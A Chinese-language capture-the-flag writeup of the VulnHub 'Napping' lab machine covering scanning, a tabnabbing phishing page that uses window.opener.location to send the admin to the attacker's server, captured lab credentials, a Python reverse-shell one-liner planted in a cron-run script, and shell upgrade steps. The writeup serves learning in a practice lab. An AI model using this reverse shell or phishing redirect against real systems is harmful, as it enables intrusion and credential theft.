首页 > 其他分享 >Napping - vulnhub - writeup

Napping - vulnhub - writeup

时间:2023-09-17 17:00:30浏览次数:29  
标签:rw -- writeup Napping 192.168 vulnhub adrian Oct 2021

Napping - vulnhub - writeup

信息收集

目标开放了22和80。

root@kali ~ » arp-scan -I eth1 -l
Interface: eth1, type: EN10MB, MAC: 00:0c:29:02:72:37, IPv4: 192.168.56.102
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.56.100  08:00:27:dd:a2:66       PCS Systemtechnik GmbH
192.168.56.103  08:00:27:49:ee:4d       PCS Systemtechnik GmbH

2 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.295 seconds (111.55 hosts/sec). 2 responded
root@kali ~ » nmap -A -sT -p- --min-rate 6000 192.168.56.103 -o /root/Desktop/nmapResult/napping.nmap
Starting Nmap 7.94 ( https://nmap.org ) at 2023-09-15 02:38 EDT
Nmap scan report for 192.168.56.103
Host is up (0.0016s latency).
Not shown: 65533 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 24:c4:fc:dc:4b:f4:31:a0:ad:0d:20:61:fd:ca:ab:79 (RSA)
|   256 6f:31:b3:e7:7b:aa:22:a2:a7:80:ef:6d:d2:87:6c:be (ECDSA)
|_  256 af:01:85:cf:dd:43:e9:8d:32:50:83:b2:41:ec:1d:3b (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Login
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
|_http-server-header: Apache/2.4.41 (Ubuntu)
MAC Address: 08:00:27:49:EE:4D (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   1.60 ms 192.168.56.103

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 15.21 seconds

访问首页是一个登录页面,还有跳转到注册的链接。先看看目录,发现一个有意思的config页面,但是访问空白,尝试fuzz了参数但没有什么发现。

image-20230915144842436

注册一个用户登录,欢迎页面可以提交一个链接,根据他的意思就是帮助博客推广,提供的链接会有管理员审核。

image-20230917164102592

网页钓鱼

那可以尝试钓鱼,伪造这个站的登录交上去,管理员可能会误以为登录失效而重新登录。本来直接用setoolkit的,但是好像python版本不同导致库的使用方式也不一样,因为这个是在kali里编译了就懒得再去改代码了。

image-20230915150903534

用cs来克隆一下登录 页面,下面没截到,但开了键盘监听。

image-20230915152536131

但忘了一件重要的事:这个机子访问肯定用的计划任务,如下他用的python脚本,键盘监听肯定没用!

image-20230915154025550

那就自己手动来,将页面源代码下载下来之后想怎么监听表单信息,首先想的是用下面这种但无效,可能是新窗口无法访问这个链接的原因。

<script>
    window.open("http://192.168.56.102:1212/index.php", "_self");
</script>

然后尝试直接从当前窗口中导航到那个url,但这种也不行。

<script>
	window.location.href = "http://192.168.56.102:1212/index.php";
</script>

试着使用这种,直接将父窗口的位置修改成指定的url就可以生效了。

<script>
    window.opener.location="http://192.168.56.102:1212/index.php";
</script>

最后得到了凭据: username=daniel&password=C%40ughtm3napping123

image-20230915161457084

ssh登录

但是密码不管是登录还是ssh都失败了,后面才猛然想起密码应该是经过了url编码,最后的凭据为: daniel:C@ughtm3napping123

image-20230917122635882

python反弹shell

无权执行sudo,上传了linpease没有什么可以直接利用的,不过可以看到这还有一个用户adrian

image-20230917152207687

但在文件这里可以看到另外一个用户adrain那里有个疑似flag的文件。

image-20230917151553517

到这个目录下查看权限,这个user.txt无权访问,但是根据上面的daniel和adrian都同属于administrator这个组,所以query.py是有读写权限的。

daniel@napping:~$ cd /home/adrian/; ls -al
total 48
drwxr-xr-x 3 adrian adrian          4096 Sep 15 06:28 .
drwxr-xr-x 4 root   root            4096 Oct 12  2021 ..
lrwxrwxrwx 1 adrian adrian             9 Oct 12  2021 .bash_history -> /dev/null
-rw-r--r-- 1 adrian adrian             0 Feb 25  2020 .bash_logout
-rw-r--r-- 1 adrian adrian             0 Feb 25  2020 .bashrc
drwx------ 2 adrian adrian          4096 Oct 11  2021 .cache
lrwxrwxrwx 1 adrian adrian             9 Oct 12  2021 .mysql_history -> /dev/null
-rw-r--r-- 1 adrian adrian             0 Feb 25  2020 .profile
-rw-rw-r-- 1 adrian adrian            75 Oct 11  2021 .selected_editor
-rw-r--r-- 1 adrian adrian             0 Oct 11  2021 .sudo_as_admin_successful
-rw------- 1 adrian adrian             0 Oct 30  2021 .viminfo
-rw-rw-r-- 1 adrian administrators   481 Oct 30  2021 query.py
-rw-rw-r-- 1 adrian adrian         19840 Sep 17 07:24 site_status.txt
-rw------- 1 adrian adrian            22 Oct 12  2021 user.txt

现在可以写入反弹shell的语句,文件名是查询的意思,应该是会有定时任务去执行他。上传pspy看一下果然,执行的uid为1000就是adrian这个用户。

2023/09/17 07:40:01 CMD: UID=0     PID=96528  | /usr/sbin/CRON -f 
2023/09/17 07:40:01 CMD: UID=1000  PID=96530  | /bin/sh -c /usr/bin/python3 /home/adrian/query.py 
2023/09/17 07:40:01 CMD: UID=0     PID=96531  | /bin/sh -c /usr/bin/python3 /root/del_links.py 
2023/09/17 07:40:01 CMD: UID=0     PID=96532  | /usr/bin/python3 /root/del_links.py

写入反弹shell的python语句,等一会他执行了就会得到会话。

import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.56.102",5555));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")

image-20230917155643119

完全交互式shell

设置环境变量,ctrl+z发送到后台,执行下面的命令升级到完全交互式shell。

export TERM=xterm    // 允许clear
Ctrl + z 
stty raw -echo;fg    
reset

image-20230917161244657

提权

到这就简单了,利用一手vim提权

标签:rw,--,writeup,Napping,192.168,vulnhub,adrian,Oct,2021
From: https://www.cnblogs.com/bktown/p/17709185.html

相关文章

  • 【vulnhub】——DC-9靶机
    【vulnhub】——DC-9靶机1.主机发现扫描kali主机C段(Kali和DC-9主机在同一个网关下):发现主机为192.168.108.146,进行详细端口扫描:可以看到靶机开了一个ssh和http服务。可以使用ssh弱密码爆破,但是可以看到22端口的状态是filter,这里先看web部分。2.SQL注入打开相应网页可以......
  • 《VulnHub》DarkHole:1
    @目录1:靶场信息2:打靶2.1:情报收集&威胁建模2.2:漏洞分析&渗透攻击3:总结3.1:命令&工具3.1.1:Nmap3.2:关键技术VulnHub打靶记录。官网:https://www.vulnhub.com攻击机为Kali-Linux-2023.2-vmware-amd64。KaliNATIP:192.168.8.10。1:靶场信息靶场网址:https://www.vulnhub.com/e......
  • [Writeup]2022 NewstarCTF_Week2(Web部分)
    一只网络安全菜鸟--(˙<>˙)/--写博客主要是想记录一下自己的学习过程,过两年毕业了也能回头看看自己都学了些啥东西。由于本人水平有限内容难免有错误、疏漏、逻辑不清、让人看不懂等各种问题,恳请大家批评指正如果我写的东西能对你有一点点帮助,那真是再好不过了......
  • Vulnhub:Kira: CTF靶机
    kali:192.168.111.111靶机:192.168.111.238信息收集端口扫描nmap-A-sC-v-sV-T5-p---script=http-enum192.168.111.238访问80端口点击upload发现是个上传点点击language发现存在文件包含上传php图片马再利用文件包含反弹shellhttp://192.168.111.238/languag......
  • 《VulnHub》Empire:Breakout
    @目录1:靶场信息2:打靶2.1:情报收集&威胁建模2.2:漏洞分析&渗透攻击3:总结3.1:命令&工具3.1.1:Nmap3.2:关键技术VulnHub打靶记录。官网:https://www.vulnhub.com/攻击机为Kali-Linux-2023.2-vmware-amd64。KaliNATIP:192.168.8.10。1:靶场信息靶场网址:https://www.vulnhub.com/......
  • Vulnhub: INO: 1.0.1靶机
    kali:192.168.111.111靶机:192.168.111.234信息收集端口扫描nmap-A-sC-v-sV-T5-p---script=http-enum192.168.111.23480端口目录爆破gobusterdir-uhttp://192.168.111.234/lot-w/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt-xphp,bak,txt,......
  • Vulnhub: Inferno: 1.1靶机
    kali:192.168.111.111靶机:192.168.111.233信息收集端口扫描nmap-A-sC-v-sV-T5-p---script=http-enum192.168.111.23380端口目录爆破gobusterdir-uhttp://192.168.111.233-w/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt-xphp,bak,txt,html......
  • Vulnhub: Hogwarts: Bellatrix靶机
    kali:192.168.111.111靶机:192.168.111.228信息收集端口扫描nmap-A-sC-v-sV-T5-p---script=http-enum192.168.111.228访问80端口查看源码,提示ikilledsiriusblack.php和文件包含的参数名file漏洞利用ikilledsiriusblack.php存在文件包含http://192.168.111.228/......
  • Vulnhub: Ragnar Lothbrok: 1靶机
    kali:192.168.111.111靶机:192.168.111.226信息收集端口扫描nmap-A-sC-v-sV-T5-p---script=http-enum192.168.111.226作者提示修改hosts文件目录爆破gobusterdir-uhttp://armbjorn-w/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt-xphp,ba......
  • 【渗透测试】Vulnhub EMPIRE BREAKOUT
    渗透环境攻击机:   IP: 192.168.149.128(Kali)靶机:     IP:192.168.149.130靶机下载地址:https://www.vulnhub.com/entry/empire-breakout,751/进行渗透一、获取IP及端口信息开机已经能看到靶机的IP,我们就不再扫描网段了。扫描端口、系统、版本nmap-sV-......